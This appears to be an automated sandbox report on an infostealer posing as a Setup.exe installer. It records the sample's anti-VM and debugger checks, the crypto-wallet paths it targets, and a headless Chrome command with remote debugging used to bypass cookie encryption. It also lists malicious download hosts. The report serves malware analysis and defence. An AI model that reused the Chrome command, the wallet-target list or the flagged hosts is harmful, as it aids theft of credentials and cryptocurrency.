Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-79732

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031B2080 FindFirstFileA,FindNextFileA,Sleep,		0_2_031B2080
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031ADED0 FindFirstFileA,PathMatchSpecA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,FindClose,FindClose,		0_2_031ADED0

Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Setup.exe, 00000000.00000002.2277405706.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A47000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: chrome.exe, 00000002.00000002.2945269308.0000620400DC8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=f7f913dd-cef0-4f04-a809-9f60667750c4
Source: Amcache.hve.9.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: chrome.exe, 00000002.00000002.2931736343.0000026607F18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.9.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: chrome.exe, 00000002.00000003.2112395333.0000620401404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2947250233.0000620401604000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ~]lx{tn~lzyqeMu{_tvwpd
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.9.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\Setup.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_031FBEAD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_031FBEAD

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D50367 mov edx, dword ptr fs:[00000030h]	0_2_02D50367
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D50927 mov eax, dword ptr fs:[00000030h]	0_2_02D50927
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D889B4 mov eax, dword ptr fs:[00000030h]	0_2_02D889B4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D50F77 mov eax, dword ptr fs:[00000030h]	0_2_02D50F77
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D50F76 mov eax, dword ptr fs:[00000030h]	0_2_02D50F76
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D50CD7 mov eax, dword ptr fs:[00000030h]	0_2_02D50CD7
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031D71D0 mov eax, dword ptr fs:[00000030h]	0_2_031D71D0

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_031AA250 GetProcessHeap,RtlAllocateHeap,RtlReAllocateHeap,GetLastError,HeapFree,

0_2_031AA250

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031D803E SetUnhandledExceptionFilter,	0_2_031D803E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031D7439 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_031D7439
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031FBEAD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_031FBEAD
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031D7EE1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_031D7EE1

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: Setup.exe PID: 6900, type: MEMORYSTR

Source: C:\Users\user\Desktop\Setup.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0320C305
Source: C:\Users\user\Desktop\Setup.exe	Code function: GetLocaleInfoW,	0_2_0320C22F
Source: C:\Users\user\Desktop\Setup.exe	Code function: GetLocaleInfoW,	0_2_03204210
Source: C:\Users\user\Desktop\Setup.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0320C129
Source: C:\Users\user\Desktop\Setup.exe	Code function: GetLocaleInfoW,	0_2_0320C000
Source: C:\Users\user\Desktop\Setup.exe	Code function: GetLocaleInfoEx,	0_2_031EEE33
Source: C:\Users\user\Desktop\Setup.exe	Code function: EnumSystemLocalesW,	0_2_0320BD0D
Source: C:\Users\user\Desktop\Setup.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0320BDA0
Source: C:\Users\user\Desktop\Setup.exe	Code function: EnumSystemLocalesW,	0_2_0320BC27
Source: C:\Users\user\Desktop\Setup.exe	Code function: EnumSystemLocalesW,	0_2_0320BC72
Source: C:\Users\user\Desktop\Setup.exe	Code function: EnumSystemLocalesW,	0_2_03203C8D

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_031D80F5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_031D80F5

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_03204F52 GetTimeZoneInformation,

0_2_03204F52

Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Setup.exe, 00000000.00000003.1878083732.0000000003C40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Roaming\Electrum\wallets
Source: Setup.exe, 00000000.00000003.1878083732.0000000003C40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Roaming\ElectronCash\wallets
Source: Setup.exe, 00000000.00000002.2277405706.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: nt*","window-state.json"],"tp":2},{"a":"w"
Source: Setup.exe, 00000000.00000002.2277405706.0000000000A58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: Setup.exe, 00000000.00000003.1878083732.0000000003C40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: Setup.exe, 00000000.00000002.2277405706.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: Setup.exe, 00000000.00000002.2277405706.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: Setup.exe, 00000000.00000003.1878125881.0000000003C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Roaming\Exodus
Source: Setup.exe, 00000000.00000003.1878083732.0000000003C40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Roaming\Ethereum
Source: Setup.exe, 00000000.00000003.1878125881.0000000003C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Roaming\Coinomi\Coinomi\wallets
Source: Setup.exe, 00000000.00000003.1878083732.0000000003C40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: multidoge.wallet
Source: Setup.exe, 00000000.00000002.2277405706.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: Setup.exe, 00000000.00000002.2277405706.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: Setup.exe, 00000000.00000003.1878083732.0000000003C40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Roaming\Ledger Live

Source: Yara match	File source: 00000000.00000003.1878083732.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2277405706.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Setup.exe PID: 6900, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\Setup.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Process Injection	1 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Query Registry	Remote Desktop Protocol	1 Data from Local System	1 Remote Access Software	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	41 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	2 Process Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	12 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Setup.exe	5%	ReversingLabs

Source	Detection	Scanner	Label
http://anglebug.com/5421F	0%	Avira URL Cloud	safe
https://klipcatepiu0.shop/int_clp_ldr_sha.txtL	100%	Avira URL Cloud	malware
https://ras2.shop/Up;	0%	Avira URL Cloud	safe
http://anglebug.com/5750P	0%	Avira URL Cloud	safe
http://anglebug.com/3498P	0%	Avira URL Cloud	safe
https://klipcatepiu0.shop/int_clp_ldr_sha.txt	100%	Avira URL Cloud	malware
http://anglebug.com/4551Q	0%	Avira URL Cloud	safe
http://anglebug.com/6651N	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	23.55.153.106	true	false	high
plus.l.google.com	142.250.181.78	true	false	high
play.google.com	172.217.19.206	true	false	high
www.google.com	172.217.21.36	true	false	high
ras2.shop	104.21.2.114	true	true	unknown
apis.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://steamcommunity.com/profiles/76561199680660089	false		high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://klipcatepiu0.shop/int_clp_ldr_sha.txt	Setup.exe, 00000000.00000003.1878125881.0000000003C00000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	false		high
http://anglebug.com/4633	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941515657.000062040068C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7382	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941515657.000062040068C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.gstatic.cn/recaptcha/	Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://polymer.github.io/AUTHORS.txt	chrome.exe, 00000002.00000003.1918543284.0000620400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916945926.00006204010B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918698794.000062040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918653153.0000620401144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916921151.0000620401060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916877024.0000620400F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918204826.0000620400794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1917175520.000062040107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918256122.0000620400FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918223939.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1917099128.0000620400F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2939482052.00006204002A4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5750P	chrome.exe, 00000002.00000002.2942681589.000062040081C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://photos.google.com?referrer=CHROME_NTP	chrome.exe, 00000002.00000003.1918543284.0000620400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918698794.000062040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918653153.0000620401144000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com/dl/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305/cocncan	chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.innosetup.com/	Setup.exe, 00000000.00000000.1676102546.0000000000401000.00000020.00000001.01000000.00000003.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	Setup.exe, 00000000.00000003.1834175101.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	false		high
https://ogs.google.com/widget/callout?eom=1	chrome.exe, 00000002.00000003.1952537279.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952731543.0000620402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952700993.0000620403134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953625797.0000620403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953393315.00006204030A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953579957.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2950780851.00006204030B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953155697.00006204030D8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6929	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942681589.000062040081C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	false		high
https://www.google.com/dl/release2/chrome_component/acccxbt6wwsvpxzpob4hojndwkqq_4.10.2830.0/oimompe	chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com/dl/release2/chrome_component/ads7ltfl2gw6hxwgakn3sxrkoijq_9.53.0/gcmjkmgdlgnkk	chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7246	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7369	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941515657.000062040068C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942124853.0000620400730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2940384726.0000620400484000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	false		high
https://anglebug.com/7489	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://dl.google.com/release2/chrome_component/j2hxfei2occ5siitujtlwgp6xi_3/ojhpjlocmbogdgmfpkhlaaea	chrome.exe, 00000002.00000002.2943659637.0000620400A44000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/PATENTS.txt	chrome.exe, 00000002.00000003.1918543284.0000620400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916945926.00006204010B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918698794.000062040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918653153.0000620401144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916921151.0000620401060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916877024.0000620400F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918204826.0000620400794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1917175520.000062040107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918256122.0000620400FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918223939.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1917099128.0000620400F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2939482052.00006204002A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/161903006	chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945149057.0000620400D90000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive-daily-5.corp.google.com/	chrome.exe, 00000002.00000002.2939749571.000062040030C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1908096372.0000620400490000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions	chrome.exe, 00000002.00000002.2940720564.00006204004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945845923.0000620400F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942239090.0000620400760000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3498P	chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_pa	chrome.exe, 00000002.00000002.2940561447.00006204004BC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ogs.goog	chrome.exe, 00000002.00000002.2946015574.0000620400F69000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/dl/release2/chrome_component/fw4ggtylvtq6i65ti33m4vqijm_2024.12.14.1/kiabhabj	chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4722	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2940210207.000062040041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp	false		high
https://m.google.com/devicemanagement/data/api	chrome.exe, 00000002.00000002.2939291138.00006204001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1906873945.00006204001C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/u/0/create?usp=chrome_actions	chrome.exe, 00000002.00000002.2940720564.00006204004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945845923.0000620400F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942239090.0000620400760000.00000004.00000800.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	false		high
